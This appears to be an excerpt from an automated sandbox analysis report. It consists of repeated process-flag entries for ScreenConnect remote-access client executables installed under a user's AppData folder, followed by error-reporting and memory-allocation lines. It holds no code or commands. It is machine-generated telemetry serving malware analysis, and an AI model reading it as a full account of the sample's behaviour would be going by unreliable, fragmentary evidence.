                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1BCA29D0000 memory reserve | memory write watchJump to behavior
